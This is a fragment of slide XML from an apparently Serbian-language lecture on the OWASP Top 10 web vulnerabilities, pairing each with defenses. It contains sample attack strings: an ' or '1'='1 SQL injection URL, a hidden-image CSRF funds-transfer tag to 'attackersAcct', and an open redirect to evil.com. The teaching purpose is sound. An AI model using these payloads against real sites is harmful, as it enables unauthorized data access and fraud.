              <a:t>ž</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avanje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nije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dobro.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Ako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>koriste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sigurnosni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headeri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browser, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pri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slanju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podataka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4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A6 Sensitive Data Exposure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Enkripcija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svih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senzitivnih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podataka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Ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" err="1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uvajte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osetljive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podatke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na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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bespotrebno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Koristite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jake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enkripcione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algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>klju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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve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enkripciju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err="1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uvanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>koristite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posebne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algoritme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njihovu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enkripciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, PBKDF2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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215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6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Missing Function Level Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control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U/I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>omogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ć</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ava </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pristup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funkcijama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koj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trebale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>budu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vidljive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> obi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nim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korisnicima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Serverske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autentifikacije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isklju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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ene</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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Bezbednosne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provere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en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>š</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preko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informacija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napada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>č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daje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34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6500" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Missing Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Level Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6500" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control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Mehanizmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>po</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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trebal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0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da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spreče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sav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pristup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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zahtevaju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eksplicitna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prava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pristup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svakoj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stranici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4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en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A8 Cross-Site Request Forgery </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" u="sng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Ne postojanje mehanizma provere sa koje adrese se podaci salju sereru.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http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transferFunds?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1500&amp;destinationAccount=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width="0" height="0" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4000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2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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A8 Cross-Site Request Forgery </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" u="sng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Postavljanje u hidden polje forme neku vrstu jedinstvenog tokena, koji se menja za svaki pristup formi.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Korišćenje referer header-a(Može dovesti do problema u nekim situacijama)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7716253" cy="5534527"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="6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sr-Latn-RS" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sigurni ulaz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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blokada portova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sr-Latn-RS" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP – port 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-1143000" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-RS" sz="7200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US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69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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9-Using Components with Known Vulnerabilities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Provera da li ste bezbedni na ovakvu vrstu napada nije lako. Sajtovi poput CVE i NVD mogu da pomognu u pretrazi. Takođe morate pratiti sajtove komponenti, za eventualne patch-eve i update-ove.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2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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9-Using Components with Known Vulnerabilities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Identifikacija svih komponenti koje koristite, kao i njihove verzije.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Praćenje sigurnosti tih komponenti u javni bazama, kao što su već pomenuti sajtovi.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Uspostavljanje bezbednosnih polisa, koje će da reguliše korišćenje komponenti.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5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6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10-Unvalidated Redirects and Forwards </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" u="sng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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web  aplikacije  često  preusmeravaju  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>korisnike  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>na  druge  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stranice i koriste neproverene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>podatke kako bi utvrdile odredišne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stranice.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http://www.example.com/redirect.jsp?url=evil.com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51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6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10-Unvalidated Redirects and Forwards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Najbolje je izbegavati redirekcije.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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ako se moraju koristiti, proveriti sve podatke prosleđene preko url-a, tako da budete sigurni da su oni validni i da korisnik ima pravo pristupa njima.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4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8349" y="2188392"/>
            <a:ext cx="5615189" cy="1108600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8000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primeri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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37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7716253" cy="5534527"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="6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just"/>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="18500" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TOP 10</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="18500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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A1 Injection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A2 Broken Authentication and Session Management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A3 Cross-Site Scripting (XSS)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A4 Insecure Direct Object References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A5 Security Misconfiguration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A6 Sensitive Data Exposure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A7 Missing Function Level Access Control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A8 Cross-Site Request Forgery (CSRF)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A9 Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="11600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="1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95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A1 Injection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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redstavlja umetanje SQL koda u poslati GET zahtev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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com/accountView?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=' or '1'=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rezultat: svi unosi iz tabele</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="sr-Latn-RS" sz="7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A1 Injection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Koristiti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specijalni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>koji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potpuno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izbegava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> interpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ili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ima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parametrizovane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naredbe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skloniti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specijalne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znakove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iz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upita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pazeći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na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specifičnosti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samog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interpretera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validacija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ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poljima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t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izbegl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avanje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specijalnih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znakova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algn="just"/>
            <a:endParaRPr lang="sr-Latn-RS" sz="7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8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sr-Latn-RS" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication and Session Management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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rađa sesije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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sale/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saleitems?sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=268544541&amp;dest=Hai</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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Poseta drugog sajta dok traje sesija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Zatvaranje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pregledača umesto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000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094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sr-Latn-RS" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Authentication and Session Management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Programerima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pruži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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jedinstven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skup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/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sr-Latn-RS" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>akih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sistema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upravljanje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/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autentifikacijom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sesijama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000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prečavanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>napada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koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mogu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iskoristiti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za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krađu</a:t>
            </a:r>
            <a:r>
